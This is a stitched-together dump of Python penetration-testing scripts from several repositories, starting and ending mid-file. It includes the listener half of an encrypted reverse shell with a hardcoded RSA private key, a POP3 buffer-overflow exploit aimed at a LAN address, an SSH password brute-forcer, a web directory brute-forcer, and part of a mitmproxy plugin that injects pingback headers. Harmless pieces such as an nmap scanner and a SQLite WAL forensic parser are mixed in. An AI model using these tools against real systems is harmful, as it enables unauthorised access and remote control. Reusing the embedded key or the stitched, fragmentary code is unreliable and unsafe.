B6Hq+TiZFh9bWyceRPjvzJh3LZ2FJUh99kJ28ykIph9XjGMgXZVFmPOFYM7zFKYN
TPgZbO5RCj1LJVJqGlXThJ8PA+7rWwquDgTPMkiH4wP59K2Dz122FYoBDZ8KgP6H
XzcG18q5o/KxONO0whnOSFJQm2XnnbtM8g2DM+x6sYTWf+v75bMAdfNuzBeFNIxA
3FGpzaad+Dv1VNtDW6za5w+tpUjTnUrHyYGsPMo3+hXknhvFL9cmAktlYR+l3qXx
xRK1/zgPexfBTpu7i1qUZilEq5pej/3s0mTtmP7l1MMFU4e7xiBPTzX9QYtvruI5
pDbgT8tFmwhi64wm0mkagNiGDnV1vlHQs6s2rP6lbpvnL7GDOhgwgj1OGV3c13n3
Va82hzcUKsKRb4XKLUvTSaECAwEAAQ==
-----END PUBLIC KEY-----'''
encryptor = RSA.importKey(publickey)
global encriptedData
encriptedData=encryptor.encrypt(message, 0)
return encriptedData[0]
def decrypt(cipher):
#Remember that here we define our (the server's) private key
privatekey = '''-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----'''
decryptor = RSA.importKey(privatekey)
dec = decryptor.decrypt(cipher)
return dec
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("10.10.10.100", 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
while True:
store = ''
command = raw_input("Shell> ")
command = encrypt(command)
if 'terminate' in command:
conn.send('terminate')
conn.close()
break
else:
conn.send(command)
result = conn.recv(512)
if len ( decrypt (result) ) ==512:
store = store + decrypt (result)
result = conn.recv(512)
store = store + decrypt (result)
#If the received output was bigger than 1024 Bytes, then we need to repeat the last two lines
else:
print decrypt (result)
print store
def main ():
connect()
main()
| 40.482993 | 109 | 0.808922 |
owtf | """
GREP Plugin for DoS Failure to Release Resources (OWASP-DS-007)
https://www.owasp.org/index.php/Testing_for_DoS_Failure_to_Release_Resources_%28OWASP-DS-007%29
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for timing information"
def run(PluginInfo):
return plugin_helper.FindTopTransactionsBySpeed()
| 33.384615 | 95 | 0.786996 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
string="A"*2606 + "\x8f\x35\x4a\x5f" +"C"*390
if 1:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
data=s.recv(1024)
print str(data)
print "done"
#s.send('QUIT\r\n')
#s.close()
| 17.551724 | 54 | 0.577281 |
cybersecurity-penetration-testing | fields = {
'name' : 'sean',
'password' : 'password!',
'login' : 'LogIn'
}
opener = urllib2.build_opener(
urllib2.HTTPCookieProcessor()
)
request = urllib2.Request(
"http://example.com/login",
urllib.urlencode(fields))
url = opener.open(request)
response = url.read()
url = opener.open("http://example.com/dashboard")
response = url.read()
| 18.166667 | 49 | 0.688953 |
Effective-Python-Penetration-Testing | from Crypto.Cipher import AES
encrypt_AES = AES.new('secret-key-12345', AES.MODE_CBC, 'This is an IV456')
message = "This is message "
ciphertext = encrypt_AES.encrypt(message)
print ciphertext
decrypt_AES = AES.new('secret-key-12345', AES.MODE_CBC, 'This is an IV456')
message_decrypted = decrypt_AES.decrypt(ciphertext)
print message_decrypted
| 37.666667 | 75 | 0.760807 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if “” in host:
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
| 42.627451 | 111 | 0.764838 |
cybersecurity-penetration-testing | import argparse
import binascii
import csv
import logging
import os
import re
import struct
import sys
from collections import namedtuple
from tqdm import trange
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = '''This scripts processes SQLite "Write Ahead Logs" and extracts database entries that may
contain deleted records or records that have not yet been added to the main database.'''
def main(wal_file, output_dir, **kwargs):
"""
The main function parses the header of the input file and identifies the WAL file. It then splits the file into
the appropriate frames and send them for processing. After processing, if applicable, the regular expression
modules are ran. Finally the raw data output is written to a CSV file.
:param wal_file: The filepath to the WAL file to be processed
:param output_dir: The directory to write the CSV report to.
:return: Nothing.
"""
msg = 'Identifying and parsing file header'
print '[+]', msg
logging.info(msg)
wal_attributes = {'size': os.path.getsize(wal_file), 'header': {}, 'frames': {}}
with open(wal_file, 'rb') as wal:
# Parse 32-byte WAL header.
header = wal.read(32)
# If file is less than 32 bytes long: exit wal_crawler.
try:
wal_attributes['header'] = dictHelper(header, '>4s7i', namedtuple('struct',
'magic format pagesize checkpoint '
'salt1 salt2 checksum1 checksum2'))
except struct.error, e:
logging.error('STRUCT ERROR:', e.message)
print '[-]', e.message + '. Exiting..'
sys.exit(2)
# Do not proceed in the program if the input file is not a WAL file.
magic_hex = binascii.hexlify(wal_attributes['header']['magic'])
if magic_hex != "377f0682" and magic_hex != "377f0683":
logging.error('Magic mismatch, expected 0x377f0682 or 0x377f0683 | received {}'.format(magic_hex))
print '[-] File does not have appropriate signature for WAL file. Exiting...'
sys.exit(3)
logging.info('File signature matched.')
logging.info('Processing WAL file.')
# Calculate number of frames.
frames = (wal_attributes['size'] - 32) / (wal_attributes['header']['pagesize'] + 24)
print '[+] Identified', frames, 'Frames.'
# Parse frames in WAL file. Create progress bar using trange(frames) which is an alias for tqdm(xrange(frames)).
print '[+] Processing frames...'
for x in trange(frames):
# Parse 24-byte WAL frame header.
wal_attributes['frames'][x] = {}
frame_header = wal.read(24)
wal_attributes['frames'][x]['header'] = dictHelper(frame_header, '>6i', namedtuple('struct',
'pagenumber commit salt1'
' salt2 checksum1'
' checksum2'))
# Parse pagesize WAL frame.
frame = wal.read(wal_attributes['header']['pagesize'])
frameParser(wal_attributes, x, frame)
# Run regular expression functions.
if kwargs['m'] or kwargs['r']:
regularSearch(wal_attributes, kwargs)
# Write WAL data to CSV file.
csvWriter(wal_attributes, output_dir)
def frameParser(wal_dict, x, frame):
"""
The frameParser function processes WAL frames.
:param wal_dict: The dictionary containing parsed WAL objects.
:param x: An integer specifying the current frame.
:param frame: The content within the frame read from the WAL file.
:return: Nothing.
"""
# Parse 8-byte WAL page header
page_header = frame[0:8]
wal_dict['frames'][x]['page_header'] = dictHelper(page_header, '>b3hb', namedtuple('struct',
'type freeblocks cells offset'
' fragments'))
# Only want to parse 0x0D B-Tree Leaf Cells
if wal_dict['frames'][x]['page_header']['type'] != 13:
logging.info('Found a non-Leaf Cell in frame {}. Popping frame from dictionary'.format(x))
wal_dict['frames'].pop(x)
return
# Parse offsets for "X" cells
cells = wal_dict['frames'][x]['page_header']['cells']
wal_dict['frames'][x]['cells'] = {}
print '[+] Identified', cells, 'cells in frame', x
print '[+] Processing cells...'
for y in xrange(cells):
start = 8 + (y * 2)
wal_dict['frames'][x]['cells'][y] = {}
wal_dict['frames'][x]['cells'][y] = dictHelper(frame[start: start + 2], '>h', namedtuple('struct', 'offset'))
# Parse cell content
cellParser(wal_dict, x, y, frame)
def cellParser(wal_dict, x, y, frame):
"""
The cellParser function processes WAL cells.
:param wal_dict: The dictionary containing parsed WAL objects.
:param x: An integer specifying the current frame.
:param y: An integer specifying the current cell.
:param frame: The content within the frame read from the WAL file.
:return: Nothing.
"""
index = 0
# Create alias to cell_root to shorten navigating the WAL dictionary structure.
cell_root = wal_dict['frames'][x]['cells'][y]
cell_offset = cell_root['offset']
# Parse the payload length and rowID Varints.
payload_len, index_a = singleVarint(frame[cell_offset:cell_offset + 9])
row_id, index_b = singleVarint(frame[cell_offset + index_a: cell_offset + index_a + 9])
# Update the index. Following the payload length and rowID is the 1-byte header length.
cell_root['payloadlength'] = payload_len
cell_root['rowid'] = row_id
index += index_a + index_b
cell_root['headerlength'] = struct.unpack('>b', frame[cell_offset + index: cell_offset + index + 1])[0]
# Update the index with the 1-byte header length. Next process each Varint in "headerlength" - 1 bytes.
index += 1
types, index_a = multiVarint(frame[cell_offset + index:cell_offset+index+cell_root['headerlength']-1])
cell_root['types'] = types
index += index_a
# Immediately following the end of the Varint headers begins the actual data described by the headers.
# Process them using the typeHelper function.
diff = cell_root['payloadlength'] - cell_root['headerlength']
cell_root['data'] = typeHelper(cell_root['types'], frame[cell_offset + index: cell_offset + index + diff])
def dictHelper(data, format, keys):
"""
The dictHelper function creates an OrderedDictionary from a struct tuple.
:param data: The data to be processed with struct.
:param format: The struct format string.
:param keys: A string of the keys for the values in the struct tuple.
:return: An OrderedDictionary with descriptive keys of struct-parsed values.
"""
return keys._asdict(keys._make(struct.unpack(format, data)))
def singleVarint(data, index=0):
"""
The singleVarint function processes a Varint and returns the length of that Varint.
:param data: The data containing the Varint (maximum of 9 bytes in length as that is the maximum size of a Varint).
:param index: The current index within the data.
:return: varint, the processed varint value,
and index which is used to identify how long the Varint was.
"""
# If the decimal value is => 128 -- then first bit is set and need to process next byte.
try:
x = ord(data[index:index+1])
except TypeError:
raise TypeError
if x >= 128:
varint = (ord(data[index:index+1]) - 128) * 128 + ord(data[index + 1: index + 2])
index += 2
return varint, index
# If the decimal value is < 128 -- then first bit is not set and is the only byte of the Varint.
else:
varint = ord(data[index:index+1])
index += 1
return varint, index
def multiVarint(data):
"""
The multiVarint function is similar to the singleVarint function. The difference is that it takes a
range of data and finds all Varints within it.
:param data: The data containing the Varints.
:return: varints, a list containing the processed varint values,
and index which is used to identify how long the Varints were.
"""
varints = []
index = 0
# Loop forever until all Varints are found by repeatedly calling singleVarint.
while len(data) != 0:
varint, index_a = singleVarint(data)
varints.append(varint)
index += index_a
# Shorten data to exclude the most recent Varint.
data = data[index_a:]
return varints, index
def typeHelper(types, data):
"""
The typeHelper function decodes the serial type of the Varints in the WAL file.
:param types: The processed values of the Varints.
:param data: The raw data in the cell that needs to be properly decoded via its varint values.
:return: cell_data, a list of the processed data.
"""
cell_data = []
index = 0
# Value of type dictates how the data should be processed. See serial type table in chapter
# for list of possible values.
for type in types:
if type == 0:
cell_data.append('NULL (RowId?)')
elif type == 1:
cell_data.append(struct.unpack('>b', data[index:index + 1])[0])
index += 1
elif type == 2:
cell_data.append(struct.unpack('>h', data[index:index + 2])[0])
index += 2
elif type == 3:
# Struct does not support 24-bit integer
cell_data.append(int(binascii.hexlify(data[index:index + 3]), 16))
index += 3
elif type == 4:
cell_data.append(struct.unpack('>i', data[index:index + 4])[0])
index += 4
elif type == 5:
# Struct does not support 48-bit integer
cell_data.append(int(binascii.hexlify(data[index:index + 6]), 16))
index += 6
elif type == 6:
cell_data.append(struct.unpack('>q', data[index:index + 8])[0])
index += 8
elif type == 7:
cell_data.append(struct.unpack('>d', data[index:index + 8])[0])
index += 8
# Type 8 == Constant 0 and Type 9 == Constant 1. Neither of these take up space in the actual data.
elif type == 8:
cell_data.append(0)
elif type == 9:
cell_data.append(1)
# Types 10 and 11 are reserved and currently not implemented.
elif type > 12 and type % 2 == 0:
b_length = (type - 12) / 2
cell_data.append(data[index:index + b_length])
index += b_length
elif type > 13 and type % 2 == 1:
s_length = (type - 13) / 2
cell_data.append(data[index:index + s_length])
index += s_length
else:
msg = 'Unexpected serial type: {}'.format(type)
print '[-]', msg
logging.error(msg)
return cell_data
def csvWriter(data, output_dir):
"""
The csvWriter function writes frame, cell, and data to a CSV output file.
:param data: The dictionary containing the parsed WAL file.
:param output_dir: The directory to write the CSV report to.
:return: Nothing.
"""
headers = ['Frame', 'Salt-1', 'Salt-2', 'Frame Offset', 'Cell', 'Cell Offset', 'ROWID', 'Data']
with open(os.path.join(output_dir, 'wal_crawler.csv'), 'wb') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(headers)
for frame in data['frames']:
for cell in data['frames'][frame]['cells']:
# Only write entries for cells that have data.
if len(data['frames'][frame]['cells'][cell]['data']) > 0:
# Convert relative frame and cell offsets to file offsets.
frame_offset = 32 + (frame * data['header']['pagesize']) + (frame * 24)
cell_offset = frame_offset + 24 + data['frames'][frame]['cells'][cell]['offset']
# Cell identifiers include the frame #, salt-1, salt-2, frame offset,
# cell #, cell offset, and cell rowID.
cell_identifiers = [frame, data['frames'][frame]['header']['salt1'],
data['frames'][frame]['header']['salt2'],
frame_offset, cell, cell_offset,
data['frames'][frame]['cells'][cell]['rowid']]
# Write the cell_identifiers and actual data within the cell
writer.writerow(cell_identifiers + data['frames'][frame]['cells'][cell]['data'])
else:
continue
csvfile.flush()
csvfile.close()
def regularSearch(data, options):
"""
The regularSearch function performs either default regular expression searches for personal information
or custom searches based on a supplied regular expression string.
:param data: The dictionary containing the parsed WAL file.
:param options: The options dictionary contains custom or pre-determined regular expression searching
:return: Nothing.
"""
msg = 'Initializing regular expression module.'
print '\n{}\n[+]'.format('='*20), msg
logging.info(msg)
if options['r'] and not options['m']:
regexp = {'Custom': options['r']}
else:
# Default regular expression modules include: Credit card numbers, SSNs, Phone numbers, URLs,
# IP Addresses.
regexp = {'Visa Credit Card': r'^4\d{3}([\ \-]?)\d{4}\1\d{4}\1\d{4}$',
'SSN': r'^\d{3}-\d{2}-\d{4}$',
'Phone Number': r'^\d{3}([\ \. \-]?)\d{3}\1\d{4}$',
'URL': r"(http[s]?://)|(www.)(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+",
'IP Address': r'^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$'}
if options['r']:
regexp['Custom'] = options['r']
# Must compile each regular expression before seeing if any data "matches" it.
for exp in regexp.keys():
reg_exp = re.compile(regexp[exp])
for frame in data['frames']:
for cell in data['frames'][frame]['cells']:
for datum in xrange(len(data['frames'][frame]['cells'][cell]['data'])):
# TypeError will occur for non-string objects such as integers.
try:
match = reg_exp.match(data['frames'][frame]['cells'][cell]['data'][datum])
except TypeError:
continue
# Print any successful match to user.
if match:
msg = '{}: {}'.format(exp, data['frames'][frame]['cells'][cell]['data'][datum])
print '[*]', msg
print '='*20
if __name__ == '__main__':
parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('WAL', help='SQLite WAL file')
parser.add_argument('OUTPUT_DIR', help='Output Directory')
parser.add_argument('-r', help='Custom regular expression')
parser.add_argument('-m', help='Run regular expression module', action='store_true')
parser.add_argument('-l', help='File path of log file')
args = parser.parse_args()
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l)
log_path = os.path.join(args.l, 'wal_crawler.log')
else:
log_path = 'wal_crawler.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
logging.info('Starting Wal_Crawler v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
if not os.path.exists(args.OUTPUT_DIR):
os.makedirs(args.OUTPUT_DIR)
if os.path.exists(args.WAL) and os.path.isfile(args.WAL):
main(args.WAL, args.OUTPUT_DIR, r=args.r, m=args.m)
else:
msg = 'Supplied WAL file does not exist or is not a file'
print '[-]', msg
logging.error(msg)
sys.exit(1) | 40.919598 | 120 | 0.578373 |
cybersecurity-penetration-testing | import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage %prog '+\
'-H <target host> -u <user> -F <password list>'
)
parser.add_option('-H', dest='tgtHost', type='string',\
help='specify target host')
parser.add_option('-F', dest='passwdFile', type='string',\
help='specify password file')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails > 5:
print "[!] Exiting: Too Many Socket Timeouts"
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Thread(target=connect, args=(host, user,\
password, True))
child = t.start()
if __name__ == '__main__':
main()
| 24.410959 | 62 | 0.593851 |
cybersecurity-penetration-testing | import urllib2
import urllib
import threading
import Queue
threads = 5
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt" # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
def build_wordlist(wordlist_file):
# read in the word list
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
def dir_bruter(extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
# check if there is a file extension if not
# it's a directory path we're bruting
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
# if we want to bruteforce extensions
if extensions:
for extension in extensions:
attempt_list.append("/%s%s" % (attempt,extension))
# iterate over our list of attempts
for brute in attempt_list:
url = "%s%s" % (target_url,urllib.quote(brute))
try:
headers = {}
headers["User-Agent"] = user_agent
r = urllib2.Request(url,headers=headers)
response = urllib2.urlopen(r)
if len(response.read()):
print "[%d] => %s" % (response.code,url)
except urllib2.HTTPError,e:
if e.code != 404:
print "!!! %d => %s" % (e.code,url)
pass
word_queue = build_wordlist(wordlist_file)
extensions = [".php",".bak",".orig",".inc"]
for i in range(threads):
t = threading.Thread(target=dir_bruter,args=(extensions,))
t.start() | 26.617978 | 87 | 0.476597 |
cybersecurity-penetration-testing | #!/usr/bin/python3
import re
import sys
import json
import string
import random
import datetime
import socket
import requests
import functools
from urllib.parse import urljoin, urlparse
from threading import Lock
from Database import Database
from threading import Thread
from time import sleep
from mitmproxy import http, ctx
VERSION = '0.1'
# Must point to JSON file containing configuration mentioned in `config` dictionary below.
# One can either supply that configuration file, or let the below variable empty and fill the `config`
# dictionary instead.
CONFIGURATION_FILE = 'config.json'
config = {
'debug' : False,
# The server hostname where affected systems shall pingback.
'pingback-host': '',
'server-remote-addr': '',
'mysql-host': '',
'mysql-user': '',
'mysql-pass': '',
'mysql-database': '',
}
append_headers = (
'X-Forwarded-For',
'Referer',
'True-Client-IP',
'X-Originating-IP',
'X-Client-IP',
'Client-IP',
'X-Real-IP',
'Contact',
'Forwarded',
'CF-Connecting_IP',
'X-WAP-Profile'
)
visited_hosts = set()
add_host_lock = Lock()
database_lock = Lock()
CONNECTION_TIMEOUT = 4.0
CHUNK_SIZE = 512
def generateRandomId():
randomized = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
return "xxx" + randomized + "yyy"
# note that this decorator ignores **kwargs
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
if args not in cache:
cache[args] = obj(*args, **kwargs)
return cache[args]
return memoizer
def dbg(x):
if 'debug' in config.keys() and config['debug']:
print('[dbg] ' + x)
class SendRawHttpRequest:
def __init__(self):
self.sock = None
def connect(self, host, port, _ssl, timeout):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if _ssl:
context = ssl.create_default_context()
context.check_hostname = False
context.options |= ssl.OP_ALL
context.verify_mode = ssl.CERT_NONE
self.sock = context.wrap_socket(sock)
else:
self.sock = sock
self.sock.settimeout(timeout)
self.sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
self.sock.connect((host, port))
dbg('Connected with {}'.format(host))
return True
except Exception as e:
ctx.log.error('[!] Could not connect with {}:{}!'.format(host, port))
if config['debug']:
raise
return False
def close(self):
if self.sock:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
self.sock = None
self.raw_socket = None
self.ssl_socket = None
def receiveAll(self, chunk_size=CHUNK_SIZE):
chunks = []
while True:
chunk = None
try:
chunk = self.sock.recv(int(chunk_size))
except:
if chunk:
chunks.append(chunk)
break
if chunk:
chunks.append(chunk)
else:
break
return b''.join(chunks)
def send(self, host, port, ssl, data, timeout = CONNECTION_TIMEOUT):
if not self.connect(host, port, ssl, timeout):
return False
self.sock.send(data.encode())
resp = self.receiveAll()
self.close()
return resp
class PyCollaboratorMitmproxyAddon:
method = b''
request = None
requestBody = None
def __init__(self):
global config
self.databaseInstance = self.connection = None
if CONFIGURATION_FILE:
config.update(json.loads(open(CONFIGURATION_FILE).read()))
ctx.log.info('Initializing py-collaborator-mitmproxy-plugin.')
self.connection = None
self.createConnection()
def createConnection(self):
self.databaseInstance = Database()
ctx.log.info("Connecting to MySQL database: {}@{} ...".format(
config['mysql-user'], config['mysql-host']
))
self.connection = self.databaseInstance.connection( config['mysql-host'],
config['mysql-user'],
config['mysql-pass'],
config['mysql-database'])
if not self.connection:
ctx.log.error('Could not connect to the MySQL database! ' \
'Please configure inner `MySQL` variables such as Host, User, Password.')
sys.exit(1)
ctx.log.info('Connected.')
def executeSql(self, query, params = None):
try:
assert self.connection
database_lock.acquire()
if not params:
out = self.databaseInstance.query(query)
else:
out = self.databaseInstance.query(query, params = params)
database_lock.release()
if not out:
return []
return out
except Exception as e:
ctx.log.error('SQL query ("{}", params: {}) has failed: {}'.format(
query, str(params), str(e)
))
